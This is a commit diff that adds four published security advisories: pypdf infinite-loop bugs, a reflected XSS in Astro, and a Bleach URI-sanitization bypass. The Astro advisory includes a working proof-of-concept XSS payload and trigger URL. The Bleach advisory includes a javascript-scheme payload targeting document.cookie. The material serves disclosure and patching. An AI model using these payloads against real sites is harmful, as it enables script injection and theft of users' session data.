Publish Advisories

advisory-database[bot] · advisory-database[bot] · commit 5b6a90369740 · 2026-06-16T14:07:09.000Z
GHSA-52x6-gq3r-vpf4 GHSA-8hv8-536x-4wqp GHSA-8rfp-98v4-mmr6 GHSA-m2v9-299j-rv96
diff --git a/advisories/github-reviewed/2026/06/GHSA-52x6-gq3r-vpf4/GHSA-52x6-gq3r-vpf4.json b/advisories/github-reviewed/2026/06/GHSA-52x6-gq3r-vpf4/GHSA-52x6-gq3r-vpf4.json
@@ -0,0 +1,65 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-52x6-gq3r-vpf4",
+  "modified": "2026-06-16T14:05:41Z",
+  "published": "2026-06-16T14:05:40Z",
+  "aliases": [
+    "CVE-2026-54530"
+  ],
+  "summary": "pypdf: Possible infinite loop when retrieving fonts for layout-mode text extraction",
+  "details": "### Impact\n\nAn attacker who uses this vulnerability can craft a PDF which leads to an infinite loop. This requires extracting the text in layout mode.\n\n### Patches\n\nThis has been fixed in [pypdf==6.13.0](https://github.com/py-pdf/pypdf/releases/tag/6.13.0).\n\n### Workarounds\n\nIf you cannot upgrade yet, consider applying the changes from PR [#3830](https://github.com/py-pdf/pypdf/pull/3830).",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "pypdf"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "6.13.0"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/py-pdf/pypdf/security/advisories/GHSA-52x6-gq3r-vpf4"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/py-pdf/pypdf/pull/3830"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/py-pdf/pypdf"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/py-pdf/pypdf/releases/tag/6.13.0"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-835"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-06-16T14:05:40Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/06/GHSA-8hv8-536x-4wqp/GHSA-8hv8-536x-4wqp.json b/advisories/github-reviewed/2026/06/GHSA-8hv8-536x-4wqp/GHSA-8hv8-536x-4wqp.json
@@ -0,0 +1,58 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-8hv8-536x-4wqp",
+  "modified": "2026-06-16T14:05:06Z",
+  "published": "2026-06-16T14:05:06Z",
+  "aliases": [
+    "CVE-2026-50146"
+  ],
+  "summary": "Astro: Reflected XSS via unescaped slot name",
+  "details": "## Summary\n\nWhen a component uses a `client:*` directive, Astro inserts named slot content into a `data-astro-template` attribute without HTML escaping the slot name allowing an attacker to break out of the attribute context and inject arbitrary HTML, resulting in reflected XSS during SSR.\n\nThis is similar to GHSA-wrwg-2hg8-v723 but exploits a different injection point.\n\n## Vulnerable Code\n\n`packages/astro/src/runtime/server/render/component.ts:371:376`\n\n```ts\n// component.ts:371\n`<template data-astro-template${key !== 'default' ? `=\"${key}\"` : ''}>${children[key]}</template>`\n```\n\nI found that key is interpolated directly into the attribute value without proper escaping.\n\n## Proof of Concept\n\nFor the PoC, I set up with a minimal repository with Astro 6.3.1, Node.js: v26.0.0.\n\n**`astro.config.mjs`**\n```js\nimport react from '@astrojs/react';\nimport node from '@astrojs/node';\nimport { defineConfig } from 'astro/config';\nexport default defineConfig({\n  output: 'server',\n  adapter: node({ mode: 'standalone' }),\n  integrations: [react()],\n});\n```\n\n**`src/pages/index.astro`**\n```astro\n---\nimport Wrapper from '../components/Wrapper.jsx';\nconst slotName = Astro.url.searchParams.get('tab') ?? 'default';\n---\n<html><body>\n  <Wrapper client:load>\n    <div slot={slotName}>content</div>\n  </Wrapper>\n</body></html>\n```\n\n**`src/components/Wrapper.jsx`**\n```jsx\nexport default function Wrapper() { return null; }\n```\n\n**Payload:**\n```\nabc\"></template></astro-island><img src=x onerror=confirm(document.domain)><!--\n```\nAccessing this URL will trigger the popup.\n\nhttp://localhost:4321/?tab=abc%22%3E%3C%2Ftemplate%3E%3C%2Fastro-island%3E%3Cimg+src%3Dx+onerror%3Dconfirm(document.domain)%3E%3C!--\n\n\n\n<img width=\"1268\" height=\"592\" alt=\"image\" src=\"https://github.com/user-attachments/assets/675cdc04-4134-4d83-883c-abe16d751ec7\" />\n\n\n\nThis will render in html.\n\n```html\n<template data-astro-template=\"abc\"></template></astro-island>\n<img src=x onerror=confirm(document.domain)><!--\">content</template>\n```\n\n## Fix\n\nI suggest leveraging the existing escape function on the slot name.\n\n```ts\n// component.ts:371\n`<template data-astro-template${key !== 'default' ? `=\"${escapeHTML(String(key))}\"` : ''}>${children[key]}</template>`\n```\n\n---",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "astro"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "6.3.3"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/withastro/astro/security/advisories/GHSA-8hv8-536x-4wqp"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/withastro/astro"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-79",
+      "CWE-80"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-06-16T14:05:06Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/06/GHSA-8rfp-98v4-mmr6/GHSA-8rfp-98v4-mmr6.json b/advisories/github-reviewed/2026/06/GHSA-8rfp-98v4-mmr6/GHSA-8rfp-98v4-mmr6.json
@@ -0,0 +1,62 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-8rfp-98v4-mmr6",
+  "modified": "2026-06-16T14:06:30Z",
+  "published": "2026-06-16T14:06:29Z",
+  "aliases": [],
+  "summary": "Bleach: URI sanitization allows disallowed URI schemes with Unicode > U+00A0 in output",
+  "details": "### Impact\n\nA possible XSS bypass affects users calling `bleach.clean` with all of:\n\n* `a` in the allowed tags\n* `href` in allowed attributes\n\nThe `bleach.clean` sanitizer outputs URIs containing disallowed scheme patterns that it should be stripping. However, because the inserted Unicode characters make the scheme invalid per RFC 3986, modern browsers do not execute these as javascript: URIs. The practical security impact is limited to:\n\n- Bleach's output contains URI values that violate the caller's protocol allowlist, breaking the sanitizer's contract.\n- If a downstream system performs its own Unicode normalization on bleach's output (stripping invisible characters before rendering), the javascript: scheme could become valid. This is a non-standard processing chain but represents a theoretical secondary risk.\n\nThis is not a direct XSS vulnerability.\n\nPython code example from reporter with Bleach v6.3.0 and Python 3.13:\n\n```\nimport bleach\npayload1 = '<a href=\"javascript\\u200b:alert(document.cookie)\">Click me</a>'\nresult1 = bleach.clean(payload1)\nprint(f\"(ZWSP): {repr(result1)}\")\n```\n\nOutput:\n\n```\n(ZWSP): '<a href=\"javascript\\u200b:alert(document.cookie)\">Click me</a>'\n```\n\n### Patches\n\nUsers should upgrade to Bleach 6.4.0.\n\n### Workarounds\n\nPre-process content removing non-ASCII characters from URI schemes before sanitizing with `bleach.clean`.\n\nA strong[ Content-Security-Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP) without unsafe-inline and unsafe-eval[ script-srcs](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src) will also help mitigate the risk.\n\n### References\n\n* https://bugzilla.mozilla.org/show_bug.cgi?id=2023812\n* RFC 3986, Section 3.1 (URI Scheme syntax): scheme characters are restricted to ALPHA *( ALPHA / DIGIT / \"+\" / \"-\" / \".\" )\n\n### Reported by \n\nReported by codeant from CodeAnt AI.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "bleach"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "6.4.0"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 6.3.0"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/mozilla/bleach/security/advisories/GHSA-8rfp-98v4-mmr6"
+    },
+    {
+      "type": "WEB",
+      "url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2023812"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/mozilla/bleach"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-184"
+    ],
+    "severity": "LOW",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-06-16T14:06:29Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/06/GHSA-m2v9-299j-rv96/GHSA-m2v9-299j-rv96.json b/advisories/github-reviewed/2026/06/GHSA-m2v9-299j-rv96/GHSA-m2v9-299j-rv96.json
@@ -0,0 +1,65 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-m2v9-299j-rv96",
+  "modified": "2026-06-16T14:05:57Z",
+  "published": "2026-06-16T14:05:57Z",
+  "aliases": [
+    "CVE-2026-54531"
+  ],
+  "summary": "pypdf: Possible infinite loop when processing outlines/bookmarks in writer",
+  "details": "### Impact\n\nAn attacker who uses this vulnerability can craft a PDF which leads to an infinite loop. This requires merging a file with outlines into a writer.\n\n### Patches\n\nThis has been fixed in [pypdf==6.13.0](https://github.com/py-pdf/pypdf/releases/tag/6.13.0).\n\n### Workarounds\n\nIf you cannot upgrade yet, consider applying the changes from PR [#3830](https://github.com/py-pdf/pypdf/pull/3830).",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "pypdf"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "6.13.0"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/py-pdf/pypdf/security/advisories/GHSA-m2v9-299j-rv96"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/py-pdf/pypdf/pull/3830"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/py-pdf/pypdf"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/py-pdf/pypdf/releases/tag/6.13.0"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-835"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-06-16T14:05:57Z",
+    "nvd_published_at": null
+  }
+}
